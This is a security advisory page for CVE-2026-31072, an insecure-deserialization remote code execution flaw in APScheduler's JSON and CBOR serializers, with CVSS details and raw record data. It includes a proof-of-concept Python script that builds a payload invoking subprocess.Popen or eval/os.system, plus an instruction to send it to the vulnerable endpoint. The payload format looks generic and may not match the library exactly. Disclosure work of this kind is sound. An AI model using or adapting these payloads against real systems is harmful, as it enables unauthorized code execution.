Security Vulnerability Report
中文
CVE-2026-31072 CVSS 9.8 CRITICAL

CVE-2026-31072

Published: 2026-05-19 16:16:21
Last Modified: 2026-05-20 17:16:21
Source: [email protected]

Description

The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

APScheduler 所有版本 (包括 3.10.x)
APScheduler 4.0.0a5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json # PoC for CVE-2026-31072: APScheduler Insecure Deserialization RCE # This script generates a malicious JSON payload designed to exploit # the unmarshal_object vulnerability in APScheduler. def generate_malicious_payload(): # The payload structure targets the unmarshal_object function. # It attempts to instantiate a class that executes a command. # Note: The specific class used depends on the Python environment available on the target. # Example: Targeting a class that runs a shell command via __setstate__ # This structure mimics the behavior expected by the vulnerable serializer. payload = { "__class__": "subprocess.Popen", "__args__": [["touch", "/tmp/pwned"]] } # Alternatively, targeting os.system if the environment allows direct execution in __init__ # payload = { # "__class__": "builtins.eval", # "__args__": ["__import__('os').system('id')"] # } return json.dumps(payload) if __name__ == "__main__": print("[*] Generating malicious JSON payload for CVE-2026-31072...") payload = generate_malicious_payload() print(f"Payload: {payload}") print("[*] Send this payload to the vulnerable application endpoint.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31072", "sourceIdentifier": "[email protected]", "published": "2026-05-19T16:16:20.610", "lastModified": "2026-05-20T17:16:20.947", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6", "source": "[email protected]"}, {"url": "https://github.com/agronholm/apscheduler", "source": "[email protected]"}, {"url": "https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.